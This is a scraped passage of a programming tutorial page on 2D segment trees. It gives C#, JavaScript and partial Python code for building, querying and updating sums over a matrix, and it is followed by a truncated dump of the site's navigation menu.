sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) '''print( "The sum of the submatrix (y1, y2)->(2, 3), ", "(x1, x2)->(2, 3) is ", query(1, 1, 4, 2, 3, 2, 3)) # Function to update the valueupdate(1, 1, 4, 2, 3, 100) print( "The sum of the submatrix (y1, y2)->(2, 3), ", "(x1, x2)->(2, 3) is ", query(1, 1, 4, 2, 3, 2, 3)) // C# program for implementation// of 2D segment tree.using System; class GfG{ // Base node of segment tree.static int [,]ini_seg = new int[1000, 1000]; // final 2d-segment tree.static int [,]fin_seg = new int[1000, 1000]; // Rectangular matrix.static int [,]rect = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[,] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip, pos] = rect[strip, low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip,pos] = ini_seg[strip, 2 * pos] + ini_seg[strip, 2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[,] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos, i] = ini_seg[low, i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[,] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[,].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node, pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[,]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node, pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node,pos] = fin_seg[node, 2 * pos] + fin_seg[node, 2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[,].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} // Driver codepublic static void Main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ Console.WriteLine("The sum of the submatrix (y1, y2)->(2, 3), " + " (x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); Console.WriteLine("The sum of the submatrix (y1, y2)->(2, 3), " + "(x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)); }} /* This code contributed by PrinciRaj1992 */ <script>// Javascript program for implementation// of 2D segment tree. // Base node of segment tree. let ini_seg = new Array(1000); // final 2d-segment tree. let fin_seg = new Array(1000); for(let i = 0; i < 1000; i++) { ini_seg[i] = new Array(1000); fin_seg[i] = new Array(1000); for(let j = 0; j < 1000; j++) { ini_seg[i][j] = 0; fin_seg[i][j] = 0; } } // Rectangular matrix. let rect = [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]]; // size of x coordinate. let size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/function segment(low,high,pos,strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { let mid = Math.floor((low + high) / 2); segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/function finalSegment(low,high,pos){ if (high == low) { for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { let mid = Math.floor((low + high) / 2); finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/function finalQuery(pos,start,end,x1,x2,node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } let mid = Math.floor((start + end) / 2); let p1 = finalQuery(2 * pos, start, mid, x1, x2, node); let p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/function query(pos,start,end,y1,y2,x1,x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } let mid = Math.floor((start + end) / 2); let p1 = query(2 * pos, start, mid, y1, y2, x1, x2); let p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx*/function finalUpdate(pos,low,high,x,val,node){ if (low == high) { fin_seg[node][pos] = val; } else { let mid = Math.floor((low + high) / 2); if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/function update(pos,low,high,x,y,val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { let mid = Math.floor((low + high) / 2); if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (let i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codelet pos = 1;let low = 0;let high = 3; // Call the ini_segment() to create the// initial segment tree on x- coordinatefor (let strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to// built the 2d segment tree.finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/document.write("The sum of the submatrix (y1, y2)->(2, 3), " + " (x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)+"<br>"); // Function to update the valueupdate(1, 1, 4, 2, 3, 100); document.write("The sum of the submatrix (y1, y2)->(2, 3), " + "(x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)+"<br>"); // This code is contributed by rag2127</script> The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 25 The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 118 Time complexity : Processing Query : O(logn*logm) Modification Query: O(2*n*logn*logm) Space Complexity : O(4*m*n) ukasp 29AjayKumar princiraj1992 shubham_singh Akanksha_Rai rag2127 sweetyty sagar0719kumar array-range-queries Segment-Tree Advanced Data Structure Competitive Programming Recursion Technical Scripter Tree Recursion Tree Segment-Tree Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Ordered Set and GNU C++ PBDS 2-3 Trees | (Search, Insert and Deletion) Extendible Hashing (Dynamic approach to DBMS) Suffix Array | Set 1 (Introduction) Difference between Backtracking and Branch-N-Bound technique Competitive Programming - A Complete Guide Practice for cracking any coding interview Arrow operator -> in C/C++ with Examples Prefix Sum Array - Implementation and Applications in Competitive Programming Top 10 Algorithms and Data Structures for Competitive Programming
[ { "code": null, "e": 419, "s": 0, "text": "CoursesFor Working ProfessionalsLIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore MoreSelf-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore MoreFor StudentsLIVECompetitive ProgrammingData Structures with C++Data ScienceExplore MoreSelf-PacedDSA- Self PacedCIPJAVA / Python / C++Explore MoreSchool CoursesSchool GuidePython ProgrammingLearn To Make AppsExplore moreAll Courses" }, { "code": null, "e": 600, "s": 419, "text": "For Working ProfessionalsLIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore MoreSelf-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore More" }, { "code": null, "e": 685, "s": 600, "text": "LIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore More" }, { "code": null, "e": 702, "s": 685, "text": "DSA Live Classes" }, { "code": null, "e": 716, "s": 702, "text": "System Design" }, { "code": null, "e": 741, "s": 716, "text": "Java Backend Development" }, { "code": null, "e": 757, "s": 741, "text": "Full Stack LIVE" }, { "code": null, "e": 770, "s": 757, "text": "Explore More" }, { "code": null, "e": 842, "s": 770, "text": "Self-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore More" }, { "code": null, "e": 858, "s": 842, "text": "DSA- Self Paced" }, { "code": null, "e": 869, "s": 858, "text": "SDE Theory" }, { "code": null, "e": 894, "s": 869, "text": "Must-Do Coding Questions" }, { "code": null, "e": 907, "s": 894, "text": "Explore More" }, { "code": null, "e": 1054, "s": 907, "text": "For StudentsLIVECompetitive ProgrammingData Structures with C++Data ScienceExplore MoreSelf-PacedDSA- Self PacedCIPJAVA / Python / C++Explore More" }, { "code": null, "e": 1130, "s": 1054, "text": "LIVECompetitive ProgrammingData Structures with C++Data ScienceExplore More" }, { "code": null, "e": 1154, "s": 1130, "text": "Competitive Programming" }, { "code": null, "e": 1179, "s": 1154, "text": "Data Structures with C++" }, { "code": null, "e": 1192, "s": 1179, "text": "Data Science" }, { "code": null, "e": 1205, "s": 1192, "text": "Explore More" }, { "code": null, "e": 1265, "s": 1205, "text": "Self-PacedDSA- Self PacedCIPJAVA / Python / C++Explore More" }, { "code": null, "e": 1281, "s": 1265, "text": "DSA- Self Paced" }, { "code": null, "e": 1285, "s": 1281, "text": "CIP" }, { "code": null, "e": 1305, "s": 1285, "text": "JAVA / Python / C++" }, { "code": null, "e": 1318, "s": 1305, "text": "Explore More" }, { "code": null, "e": 1393, "s": 1318, "text": "School CoursesSchool GuidePython ProgrammingLearn To Make AppsExplore more" }, { "code": null, "e": 1406, "s": 1393, "text": "School Guide" }, { "code": null, "e": 1425, "s": 1406, "text": "Python Programming" }, { "code": null, "e": 1444, "s": 1425, "text": "Learn To Make Apps" }, { "code": null, "e": 1457, "s": 1444, "text": "Explore more" }, { "code": null, "e": 1469, "s": 1457, "text": "All Courses" }, { "code": null, "e": 3985, "s": 1469, "text": "TutorialsAlgorithmsAnalysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity QuestionSearching AlgorithmsSorting AlgorithmsGraph AlgorithmsPattern SearchingGeometric AlgorithmsMathematicalBitwise AlgorithmsRandomized AlgorithmsGreedy AlgorithmsDynamic ProgrammingDivide and ConquerBacktrackingBranch and BoundAll AlgorithmsData StructuresArraysLinked ListStackQueueBinary TreeBinary Search TreeHeapHashingGraphAdvanced Data StructureMatrixStringsAll Data StructuresInterview CornerCompany PreparationTop TopicsPractice Company QuestionsInterview ExperiencesExperienced InterviewsInternship InterviewsCompetititve ProgrammingDesign PatternsSystem Design TutorialMultiple Choice QuizzesLanguagesCC++JavaPythonC#JavaScriptjQuerySQLPHPScalaPerlGo LanguageHTMLCSSKotlinML & Data ScienceMachine LearningData ScienceCS SubjectsMathematicsOperating SystemDBMSComputer NetworksComputer Organization and ArchitectureTheory of ComputationCompiler DesignDigital LogicSoftware EngineeringGATEGATE Computer Science NotesLast Minute NotesGATE CS Solved PapersGATE CS Original Papers and Official KeysGATE 2021 DatesGATE CS 2021 SyllabusImportant Topics for GATE CSWeb TechnologiesHTMLCSSJavaScriptAngularJSReactJSNodeJSBootstrapjQueryPHPSoftware DesignsSoftware Design PatternsSystem Design TutorialSchool LearningSchool ProgrammingMathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculusMaths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 NotesNCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionRD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionPhysics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesCS Exams/PSUsISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer ExamUGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved PapersStudentCampus Ambassador ProgramSchool Ambassador ProgramProjectGeek of the MonthCampus Geek of the MonthPlacement CourseCompetititve ProgrammingTestimonialsStudent ChapterGeek on the TopInternshipCareers" }, { "code": null, "e": 4566, "s": 3985, "text": "AlgorithmsAnalysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity QuestionSearching AlgorithmsSorting AlgorithmsGraph AlgorithmsPattern SearchingGeometric AlgorithmsMathematicalBitwise AlgorithmsRandomized AlgorithmsGreedy AlgorithmsDynamic ProgrammingDivide and ConquerBacktrackingBranch and BoundAll Algorithms" }, { "code": null, "e": 4899, "s": 4566, "text": "Analysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity Question" }, { "code": null, "e": 4919, "s": 4899, "text": "Asymptotic Analysis" }, { "code": null, "e": 4949, "s": 4919, "text": "Worst, Average and Best Cases" }, { "code": null, "e": 4970, "s": 4949, "text": "Asymptotic Notations" }, { "code": null, "e": 5006, "s": 4970, "text": "Little o and little omega notations" }, { "code": null, "e": 5035, "s": 5006, "text": "Lower and Upper Bound Theory" }, { "code": null, "e": 5053, "s": 5035, "text": "Analysis of Loops" }, { "code": null, "e": 5073, "s": 5053, "text": "Solving Recurrences" }, { "code": null, "e": 5092, "s": 5073, "text": "Amortized Analysis" }, { "code": null, "e": 5128, "s": 5092, "text": "What does 'Space Complexity' mean ?" }, { "code": null, "e": 5157, "s": 5128, "text": "Pseudo-polynomial Algorithms" }, { "code": null, "e": 5194, "s": 5157, "text": "Polynomial Time Approximation Scheme" }, { "code": null, "e": 5221, "s": 5194, "text": "A Time Complexity Question" }, { "code": null, "e": 5242, "s": 5221, "text": "Searching Algorithms" }, { "code": null, "e": 5261, "s": 5242, "text": "Sorting Algorithms" }, { "code": null, "e": 5278, "s": 5261, "text": "Graph Algorithms" }, { "code": null, "e": 5296, "s": 5278, "text": "Pattern Searching" }, { "code": null, "e": 5317, "s": 5296, "text": "Geometric Algorithms" }, { "code": null, "e": 5330, "s": 5317, "text": "Mathematical" }, { "code": null, "e": 5349, "s": 5330, "text": "Bitwise Algorithms" }, { "code": null, "e": 5371, "s": 5349, "text": "Randomized Algorithms" }, { "code": null, "e": 5389, "s": 5371, "text": "Greedy Algorithms" }, { "code": null, "e": 5409, "s": 5389, "text": "Dynamic Programming" }, { "code": null, "e": 5428, "s": 5409, "text": "Divide and Conquer" }, { "code": null, "e": 5441, "s": 5428, "text": "Backtracking" }, { "code": null, "e": 5458, "s": 5441, "text": "Branch and Bound" }, { "code": null, "e": 5473, "s": 5458, "text": "All Algorithms" }, { "code": null, "e": 5616, "s": 5473, "text": "Data StructuresArraysLinked ListStackQueueBinary TreeBinary Search TreeHeapHashingGraphAdvanced Data StructureMatrixStringsAll Data Structures" }, { "code": null, "e": 5623, "s": 5616, "text": "Arrays" }, { "code": null, "e": 5635, "s": 5623, "text": "Linked List" }, { "code": null, "e": 5641, "s": 5635, "text": "Stack" }, { "code": null, "e": 5647, "s": 5641, "text": "Queue" }, { "code": null, "e": 5659, "s": 5647, "text": "Binary Tree" }, { "code": null, "e": 5678, "s": 5659, "text": "Binary Search Tree" }, { "code": null, "e": 5683, "s": 5678, "text": "Heap" }, { "code": null, "e": 5691, "s": 5683, "text": "Hashing" }, { "code": null, "e": 5697, "s": 5691, "text": "Graph" }, { "code": null, "e": 5721, "s": 5697, "text": "Advanced Data Structure" }, { "code": null, "e": 5728, "s": 5721, "text": "Matrix" }, { "code": null, "e": 5736, "s": 5728, "text": "Strings" }, { "code": null, "e": 5756, "s": 5736, "text": "All Data Structures" }, { "code": null, "e": 5976, "s": 5756, "text": "Interview CornerCompany PreparationTop TopicsPractice Company QuestionsInterview ExperiencesExperienced InterviewsInternship InterviewsCompetititve ProgrammingDesign PatternsSystem Design TutorialMultiple Choice Quizzes" }, { "code": null, "e": 5996, "s": 5976, "text": "Company Preparation" }, { "code": null, "e": 6007, "s": 5996, "text": "Top Topics" }, { "code": null, "e": 6034, "s": 6007, "text": "Practice Company Questions" }, { "code": null, "e": 6056, "s": 6034, "text": "Interview Experiences" }, { "code": null, "e": 6079, "s": 6056, "text": "Experienced Interviews" }, { "code": null, "e": 6101, "s": 6079, "text": "Internship Interviews" }, { "code": null, "e": 6126, "s": 6101, "text": "Competititve Programming" }, { "code": null, "e": 6142, "s": 6126, "text": "Design Patterns" }, { "code": null, "e": 6165, "s": 6142, "text": "System Design Tutorial" }, { "code": null, "e": 6189, "s": 6165, "text": "Multiple Choice Quizzes" }, { "code": null, "e": 6270, "s": 6189, "text": "LanguagesCC++JavaPythonC#JavaScriptjQuerySQLPHPScalaPerlGo LanguageHTMLCSSKotlin" }, { "code": null, "e": 6272, "s": 6270, "text": "C" }, { "code": null, "e": 6276, "s": 6272, "text": "C++" }, { "code": null, "e": 6281, "s": 6276, "text": "Java" }, { "code": null, "e": 6288, "s": 6281, "text": "Python" }, { "code": null, "e": 6291, "s": 6288, "text": "C#" }, { "code": null, "e": 6302, "s": 6291, "text": "JavaScript" }, { "code": null, "e": 6309, "s": 6302, "text": "jQuery" }, { "code": null, "e": 6313, "s": 6309, "text": "SQL" }, { "code": null, "e": 6317, "s": 6313, "text": "PHP" }, { "code": null, "e": 6323, "s": 6317, "text": "Scala" }, { "code": null, "e": 6328, "s": 6323, "text": "Perl" }, { "code": null, "e": 6340, "s": 6328, "text": "Go Language" }, { "code": null, "e": 6345, "s": 6340, "text": "HTML" }, { "code": null, "e": 6349, "s": 6345, "text": "CSS" }, { "code": null, "e": 6356, "s": 6349, "text": "Kotlin" }, { "code": null, "e": 6402, "s": 6356, "text": "ML & Data ScienceMachine LearningData Science" }, { "code": null, "e": 6419, "s": 6402, "text": "Machine Learning" }, { "code": null, "e": 6432, "s": 6419, "text": "Data Science" }, { "code": null, "e": 6599, "s": 6432, "text": "CS SubjectsMathematicsOperating SystemDBMSComputer NetworksComputer Organization and ArchitectureTheory of ComputationCompiler DesignDigital LogicSoftware Engineering" }, { "code": null, "e": 6611, "s": 6599, "text": "Mathematics" }, { "code": null, "e": 6628, "s": 6611, "text": "Operating System" }, { "code": null, "e": 6633, "s": 6628, "text": "DBMS" }, { "code": null, "e": 6651, "s": 6633, "text": "Computer Networks" }, { "code": null, "e": 6690, "s": 6651, "text": "Computer Organization and Architecture" }, { "code": null, "e": 6712, "s": 6690, "text": "Theory of Computation" }, { "code": null, "e": 6728, "s": 6712, "text": "Compiler Design" }, { "code": null, "e": 6742, "s": 6728, "text": "Digital Logic" }, { "code": null, "e": 6763, "s": 6742, "text": "Software Engineering" }, { "code": null, "e": 6938, "s": 6763, "text": "GATEGATE Computer Science NotesLast Minute NotesGATE CS Solved PapersGATE CS Original Papers and Official KeysGATE 2021 DatesGATE CS 2021 SyllabusImportant Topics for GATE CS" }, { "code": null, "e": 6966, "s": 6938, "text": "GATE Computer Science Notes" }, { "code": null, "e": 6984, "s": 6966, "text": "Last Minute Notes" }, { "code": null, "e": 7006, "s": 6984, "text": "GATE CS Solved Papers" }, { "code": null, "e": 7048, "s": 7006, "text": "GATE CS Original Papers and Official Keys" }, { "code": null, "e": 7064, "s": 7048, "text": "GATE 2021 Dates" }, { "code": null, "e": 7086, "s": 7064, "text": "GATE CS 2021 Syllabus" }, { "code": null, "e": 7115, "s": 7086, "text": "Important Topics for GATE CS" }, { "code": null, "e": 7189, "s": 7115, "text": "Web TechnologiesHTMLCSSJavaScriptAngularJSReactJSNodeJSBootstrapjQueryPHP" }, { "code": null, "e": 7194, "s": 7189, "text": "HTML" }, { "code": null, "e": 7198, "s": 7194, "text": "CSS" }, { "code": null, "e": 7209, "s": 7198, "text": "JavaScript" }, { "code": null, "e": 7219, "s": 7209, "text": "AngularJS" }, { "code": null, "e": 7227, "s": 7219, "text": "ReactJS" }, { "code": null, "e": 7234, "s": 7227, "text": "NodeJS" }, { "code": null, "e": 7244, "s": 7234, "text": "Bootstrap" }, { "code": null, "e": 7251, "s": 7244, "text": "jQuery" }, { "code": null, "e": 7255, "s": 7251, "text": "PHP" }, { "code": null, "e": 7318, "s": 7255, "text": "Software DesignsSoftware Design PatternsSystem Design Tutorial" }, { "code": null, "e": 7343, "s": 7318, "text": "Software Design Patterns" }, { "code": null, "e": 7366, "s": 7343, "text": "System Design Tutorial" }, { "code": null, "e": 7923, "s": 7366, "text": "School LearningSchool ProgrammingMathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculusMaths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 NotesNCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionRD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionPhysics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes" }, { "code": null, "e": 7942, "s": 7923, "text": "School Programming" }, { "code": null, "e": 8034, "s": 7942, "text": "MathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculus" }, { "code": null, "e": 8048, "s": 8034, "text": "Number System" }, { "code": null, "e": 8056, "s": 8048, "text": "Algebra" }, { "code": null, "e": 8069, "s": 8056, "text": "Trigonometry" }, { "code": null, "e": 8080, "s": 8069, "text": "Statistics" }, { "code": null, "e": 8092, "s": 8080, "text": "Probability" }, { "code": null, "e": 8101, "s": 8092, "text": "Geometry" }, { "code": null, "e": 8113, "s": 8101, "text": "Mensuration" }, { "code": null, "e": 8122, "s": 8113, "text": "Calculus" }, { "code": null, "e": 8215, "s": 8122, "text": "Maths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 Notes" }, { "code": null, "e": 8229, "s": 8215, "text": "Class 8 Notes" }, { "code": null, "e": 8243, "s": 8229, "text": "Class 9 Notes" }, { "code": null, "e": 8258, "s": 8243, "text": "Class 10 Notes" }, { "code": null, "e": 8273, "s": 8258, "text": "Class 11 Notes" }, { "code": null, "e": 8288, "s": 8273, "text": "Class 12 Notes" }, { "code": null, "e": 8417, "s": 8288, "text": "NCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution" }, { "code": null, "e": 8440, "s": 8417, "text": "Class 8 Maths Solution" }, { "code": null, "e": 8463, "s": 8440, "text": "Class 9 Maths Solution" }, { "code": null, "e": 8487, "s": 8463, "text": "Class 10 Maths Solution" }, { "code": null, "e": 8511, "s": 8487, "text": "Class 11 Maths Solution" }, { "code": null, "e": 8535, "s": 8511, "text": "Class 12 Maths Solution" }, { "code": null, "e": 8668, "s": 8535, "text": "RD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution" }, { "code": null, "e": 8691, "s": 8668, "text": "Class 8 Maths Solution" }, { "code": null, "e": 8714, "s": 8691, "text": "Class 9 Maths Solution" }, { "code": null, "e": 8738, "s": 8714, "text": "Class 10 Maths Solution" }, { "code": null, "e": 8762, "s": 8738, "text": "Class 11 Maths Solution" }, { "code": null, "e": 8786, "s": 8762, "text": "Class 12 Maths Solution" }, { "code": null, "e": 8867, "s": 8786, "text": "Physics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes" }, { "code": null, "e": 8881, "s": 8867, "text": "Class 8 Notes" }, { "code": null, "e": 8895, "s": 8881, "text": "Class 9 Notes" }, { "code": null, "e": 8910, "s": 8895, "text": "Class 10 Notes" }, { "code": null, "e": 8925, "s": 8910, "text": "Class 11 Notes" }, { "code": null, "e": 9131, "s": 8925, "text": "CS Exams/PSUsISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer ExamUGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers" }, { "code": null, "e": 9242, "s": 9131, "text": "ISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer Exam" }, { "code": null, "e": 9284, "s": 9242, "text": "ISRO CS Original Papers and Official Keys" }, { "code": null, "e": 9306, "s": 9284, "text": "ISRO CS Solved Papers" }, { "code": null, "e": 9351, "s": 9306, "text": "ISRO CS Syllabus for Scientist/Engineer Exam" }, { "code": null, "e": 9434, "s": 9351, "text": "UGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers" }, { "code": null, "e": 9460, "s": 9434, "text": "UGC NET CS Notes Paper II" }, { "code": null, "e": 9487, "s": 9460, "text": "UGC NET CS Notes Paper III" }, { "code": null, "e": 9512, "s": 9487, "text": "UGC NET CS Solved Papers" }, { "code": null, "e": 9717, "s": 9512, "text": "StudentCampus Ambassador ProgramSchool Ambassador ProgramProjectGeek of the MonthCampus Geek of the MonthPlacement CourseCompetititve ProgrammingTestimonialsStudent ChapterGeek on the TopInternshipCareers" }, { "code": null, "e": 9743, "s": 9717, "text": "Campus Ambassador Program" }, { "code": null, "e": 9769, "s": 9743, "text": "School Ambassador Program" }, { "code": null, "e": 9777, "s": 9769, "text": "Project" }, { "code": null, "e": 9795, "s": 9777, "text": "Geek of the Month" }, { "code": null, "e": 9820, "s": 9795, "text": "Campus Geek of the Month" }, { "code": null, "e": 9837, "s": 9820, "text": "Placement Course" }, { "code": null, "e": 9862, "s": 9837, "text": "Competititve Programming" }, { "code": null, "e": 9875, "s": 9862, "text": "Testimonials" }, { "code": null, "e": 9891, "s": 9875, "text": "Student Chapter" }, { "code": null, "e": 9907, "s": 9891, "text": "Geek on the Top" }, { "code": null, "e": 9918, "s": 9907, "text": "Internship" }, { "code": null, "e": 9926, "s": 9918, "text": "Careers" }, { "code": null, "e": 9965, "s": 9926, "text": "JobsApply for JobsPost a JobJOB-A-THON" }, { "code": null, "e": 9980, "s": 9965, "text": "Apply for Jobs" }, { "code": null, "e": 9991, "s": 9980, "text": "Post a Job" }, { "code": null, "e": 10002, "s": 9991, "text": "JOB-A-THON" }, { "code": null, "e": 10284, "s": 10002, "text": "PracticeAll DSA ProblemsProblem of the DayInterview Series: Weekly ContestsBi-Wizard Coding: School ContestsContests and EventsPractice SDE SheetCurated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems" }, { "code": null, "e": 10301, 